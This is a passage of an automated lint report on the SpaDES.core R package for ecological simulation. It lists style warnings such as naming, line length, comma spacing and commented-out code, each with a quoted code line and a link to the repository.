{\n^~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:162:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/inst/sampleModules/fireSpread/fireSpread.R#L162) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Fires <- spread(landscapes[[1]],\n  ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:174:14:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/inst/sampleModules/fireSpread/fireSpread.R#L174) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  landscapes$Fires <- Fires\n             ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:181:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/inst/sampleModules/fireSpread/fireSpread.R#L181) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Stats <- function(sim) {\n^~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:1:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/inst/sampleModules/randomLandscapes/randomLandscapes.R#L1) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​SpaDES.core.version <- \"0.1.0\"\n^~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:33:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/inst/sampleModules/randomLandscapes/randomLandscapes.R#L33) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"inRAM\", \"logical\", FALSE, TRUE, FALSE, \"should the raster be stored in memory?\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:34:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/inst/sampleModules/randomLandscapes/randomLandscapes.R#L34) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"nx\", \"numeric\", 100L, 10L, 500L, \"size of map (number of pixels) in the x dimension\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:35:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/inst/sampleModules/randomLandscapes/randomLandscapes.R#L35) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"ny\", \"numeric\", 100L, 10L, 500L, \"size of map (number of pixels) in the y dimension\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:37:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/inst/sampleModules/randomLandscapes/randomLandscapes.R#L37) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInitialTime\", \"numeric\", start(sim), start(sim), NA, \"time to schedule first plot event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:38:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/inst/sampleModules/randomLandscapes/randomLandscapes.R#L38) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInterval\", \"numeric\", NA_real_, NA, NA, \"time interval between plot events\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:39:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/inst/sampleModules/randomLandscapes/randomLandscapes.R#L39) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInitialTime\", \"numeric\", NA_real_, NA, NA, \"time to schedule first save event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:40:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/inst/sampleModules/randomLandscapes/randomLandscapes.R#L40) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInterval\", \"numeric\", NA_real_, NA, NA, \"time interval between save events\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:41:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/inst/sampleModules/randomLandscapes/randomLandscapes.R#L41) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".useCache\", \"logical\", FALSE, c(\"init\", \"plot\"), NA, \"should the module result be cached for future use\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:55:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/inst/sampleModules/randomLandscapes/randomLandscapes.R#L55) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.randomLandscapes <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:75:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/inst/sampleModules/randomLandscapes/randomLandscapes.R#L75) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.saveInterval, \"randomLandscapes\", \"save\", .last() + 1)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:86:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/inst/sampleModules/randomLandscapes/randomLandscapes.R#L86) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Init <- function(sim) {\n^~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:100:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/inst/sampleModules/randomLandscapes/randomLandscapes.R#L100) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DEM <- gaussMap(template, scale = 300, var = 0.03, speedup = speedup, inMemory = inMemory)\n    ^~~\n```\n[inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R:17:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R#L17) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInitialTime\", \"numeric\", NA_real_, NA, NA, \"This describes the simulation time at which the first plot event should occur\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R:18:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R#L18) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInitialTime\", \"numeric\", NA_real_, NA, NA, \"This describes the simulation time at which the first save event should occur\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:231:50:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/cache.R#L231) *style:* **Commas should always have a space after.**\n```r\n​          cat(crayon::blue(\"  Using \", fromWhere,\" copy of\", cur$moduleName, \"module\\n\"))\n                                                 ^\n```\n[R/cache.R:242:50:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/cache.R#L242) *style:* **Commas should always have a space after.**\n```r\n​          cat(crayon::blue(\"  Using \", fromWhere,\" copy of\", cur$eventType, \"event in\",\n                                                 ^\n```\n[R/cache.R:289:10:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/cache.R#L289) *style:* **Commented code should be removed.**\n```r\n​        #checkPath(cacheRepo, create = TRUE) #SpaDES dependency\n         ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:413:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/cache.R#L413) *style:* **Lines should not be more than 100 characters.**\n```r\n​        #   makes soft copy of all objects, i.e., they have the identical objects, which are pointers only\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:441:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/cache.R#L441) *style:* **Lines should not be more than 100 characters.**\n```r\n​        list2env(mget(lsObjectEnv[lsObjectEnv %in% createOutputs | lsObjectEnv %in% expectsInputs], envir = object@.envir), envir = object2@.envir)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:451:12:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/cache.R#L451) *style:* **Commented code should be removed.**\n```r\n​          #object2@events <- unique(rbindlist(list(object@events, object2@events)))\n           ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:455:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/cache.R#L455) *style:* **Lines should not be more than 100 characters.**\n```r\n​        # This is for objects that are not in the return environment yet because they are unrelated to the\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:468:10:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/cache.R#L468) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​      for(atts in attrsToGrab) {\n         ^\n```\n[R/cache.R:472:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/cache.R#L472) *style:* **Commented code should be removed.**\n```r\n​      # attr(object2, \"tags\") <- attr(object, \"tags\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:473:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/cache.R#L473) *style:* **Commented code should be removed.**\n```r\n​      # attr(object2, \"call\") <- attr(object, \"call\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:474:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/cache.R#L474) *style:* **Commented code should be removed.**\n```r\n​      # attr(object2, \"function\") <- attr(object, \"function\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:507:66:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/cache.R#L507) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  setGeneric(\".addTagsToOutput\", function(object, outputObjects, FUN) {\n                                                                 ^~~\n```\n[R/cache.R:530:48:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/cache.R#L530) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(object, outputObjects, FUN, preDigestByClass) {\n                                               ^~~\n```\n[R/cache.R:622:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/cache.R#L622) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​objSize.simList <- function(x, quick = getOption(\"reproducible.quick\", FALSE)) {\n^~~~~~~~~~~~~~~\n```\n[R/cache.R:649:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/cache.R#L649) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​makeMemoiseable.simList <- function(x) {\n^~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:657:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/cache.R#L657) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​unmakeMemoiseable.simList_ <- function(x) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/checkpoint.R:36:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/checkpoint.R#L36) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.checkpoint <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:86:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/code-checking.R#L86) *style:* **Lines should not be more than 100 characters.**\n```r\n​                xAsCall <- .isLastLineSim(x = x, xAsString = bb[seq(funStarts[yy], funEnds[yy + 1])])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:90:16:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/code-checking.R#L90) *style:* **Commented code should be removed.**\n```r\n​              #y = strsplit(bb[funStarts[yy]], split = \"\\\\s+\")[[1]][1]\n               ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:91:53:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/code-checking.R#L91) *style:* **Commas should always have a space after.**\n```r\n​              y <- paste0(cantCodeCheckMessage, \"'\",bb[funStarts[yy]], \"'\")\n                                                    ^\n```\n[R/code-checking.R:144:39:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/code-checking.R#L144) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​    if (identical(type, \"returnSim\")) { # This is intended for only the last line of a function\n                                      ^\n```\n[R/code-checking.R:182:48:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/code-checking.R#L182) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      } else if (identical(x[[1]], quote(`<-`)) ) {\n                                               ^\n```\n[R/code-checking.R:185:62:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/code-checking.R#L185) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​            if (any(grepl(x[[2]][[2]], pattern = \".envir\"))) {# i.e., sim@.envir\n                                                             ^\n```\n[R/code-checking.R:202:19:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/code-checking.R#L202) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​          x <- x[-(1:2)]\n                  ^\n```\n[R/code-checking.R:218:29:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/code-checking.R#L218) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​          x[[2]] <- x[[2]][-(1:2)]\n                            ^\n```\n[R/code-checking.R:286:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/code-checking.R#L286) *style:* **Lines should not be more than 100 characters.**\n```r\n​  allChecks <- list(simAssigns = simAssigns, simGets = simGets, returnsSim = returnsSim, assignToSim = assignToSim, fg = fg)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:319:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/code-checking.R#L319) *style:* **Lines should not be more than 100 characters.**\n```r\n​    allChecks[anyCantCodeCheck] <- lapply(names(cantCodeCheck[anyCantCodeCheck]), function(objName) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:368:51:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/code-checking.R#L368) *style:* **Commas should always have a space after.**\n```r\n​                                              \" \",verb,\" declared in outputObjects, \",\n                                                  ^\n```\n[R/code-checking.R:368:56:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/code-checking.R#L368) *style:* **Commas should always have a space after.**\n```r\n​                                              \" \",verb,\" declared in outputObjects, \",\n                                                       ^\n```\n[R/code-checking.R:384:20:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/code-checking.R#L384) *style:* **Commas should always have a space after.**\n```r\n​               \" \",verb,\" declared in inputObjects, \",\n                   ^\n```\n[R/code-checking.R:384:25:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/code-checking.R#L384) *style:* **Commas should always have a space after.**\n```r\n​               \" \",verb,\" declared in inputObjects, \",\n                        ^\n```\n[R/code-checking.R:395:90:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/code-checking.R#L395) *style:* **Commas should always have a space after.**\n```r\n​                                       paste0(paste(missingFrmMod, collapse = \", \"), \" \",verb,\n                                                                                         ^\n```\n[R/code-checking.R:440:75:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/code-checking.R#L440) *style:* **Commas should always have a space after.**\n```r\n​             \" but only for the 'get' functions, not the 'set' function \",\"\n                                                                          ^\n```\n[R/code-checking.R:454:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/code-checking.R#L454) *style:* **Lines should not be more than 100 characters.**\n```r\n​    missingInMetadata <- simAssignsNotInDotInputObjects[!(simAssignsNotInDotInputObjects %in% outputObjNames)]\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:463:24:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/code-checking.R#L463) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                       ^\n```\n[R/code-checking.R:463:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/code-checking.R#L463) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                                   ^\n```\n[R/code-checking.R:464:33:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/code-checking.R#L464) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in outputObjects\")\n                                ^\n```\n[R/code-checking.R:464:45:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/code-checking.R#L464) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in outputObjects\")\n                                            ^\n```\n[R/code-checking.R:471:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/code-checking.R#L471) *style:* **Lines should not be more than 100 characters.**\n```r\n​    missingInMetadata <- simAssignsInDotInputObjects[!(simAssignsInDotInputObjects %in% inputObjNames)]\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:480:24:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/code-checking.R#L480) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                       ^\n```\n[R/code-checking.R:480:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/code-checking.R#L480) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                                   ^\n```\n[R/code-checking.R:481:33:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/code-checking.R#L481) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                ^\n```\n[R/code-checking.R:481:45:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/code-checking.R#L481) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                            ^\n```\n[R/code-checking.R:503:24:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/code-checking.R#L503) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" used from sim inside \",\n                       ^\n```\n[R/code-checking.R:503:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/code-checking.R#L503) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" used from sim inside \",\n                                   ^\n```\n[R/code-checking.R:504:33:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/code-checking.R#L504) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                ^\n```\n[R/code-checking.R:504:45:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/code-checking.R#L504) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                            ^\n```\n[R/code-checking.R:516:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/code-checking.R#L516) *style:* **Commas should always have a space after.**\n```r\n​        \" \",verb,\" used from sim inside \",\n            ^\n```\n[R/code-checking.R:516:18:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/code-checking.R#L516) *style:* **Commas should always have a space after.**\n```r\n​        \" \",verb,\" used from sim inside \",\n                 ^\n```\n[R/code-checking.R:518:18:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/code-checking.R#L518) *style:* **Commas should always have a space after.**\n```r\n​        \", but \",verb,\" not declared in inputObjects\"\n                 ^\n```\n[R/code-checking.R:518:23:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/code-checking.R#L518) *style:* **Commas should always have a space after.**\n```r\n​        \", but \",verb,\" not declared in inputObjects\"\n                      ^\n```\n[R/code-checking.R:661:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/code-checking.R#L661) *style:* **Commented code should be removed.**\n```r\n​    #unique(pd[outerWh, \"line1\"])\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:665:34:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/code-checking.R#L665) *style:* **Commas should always have a space after.**\n```r\n​      whInner <- any((pd[outerWh,\"line1\"] < lwf) & (pd[outerWh,\"line2\"] > lwf) )\n                                 ^\n```\n[R/code-checking.R:665:64:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/code-checking.R#L665) *style:* **Commas should always have a space after.**\n```r\n​      whInner <- any((pd[outerWh,\"line1\"] < lwf) & (pd[outerWh,\"line2\"] > lwf) )\n                                                               ^\n```\n[R/code-checking.R:665:79:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/code-checking.R#L665) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      whInner <- any((pd[outerWh,\"line1\"] < lwf) & (pd[outerWh,\"line2\"] > lwf) )\n                                                                              ^\n```\n[R/copy.R:37:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/copy.R#L37) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​            sim_ <- object\n            ^~~~\n```\n[R/downloadData.R:54:96:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/downloadData.R#L54) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    io <- .parseModulePartial(sim, modules = list(module), defineModuleElement = \"inputObjects\" )\n                                                                                               ^\n```\n[R/downloadData.R:242:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/downloadData.R#L242) *style:* **Commented code should be removed.**\n```r\n​    # parsedModule <- parse(file = file.path(path, module, paste0(module, '.R')))\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:243:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/downloadData.R#L243) *style:* **Commented code should be removed.**\n```r\n​    # urls <- .getSourceURL(pattern = fileToDownload, x = parsedModule)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:250:8:](https://github.com/PredictiveEcology/SpaDES.core/blob/da41c1bb949241fd26267a0f455b5b689b66cab2/R/downloadData.R#L250) *style:* **Commented code 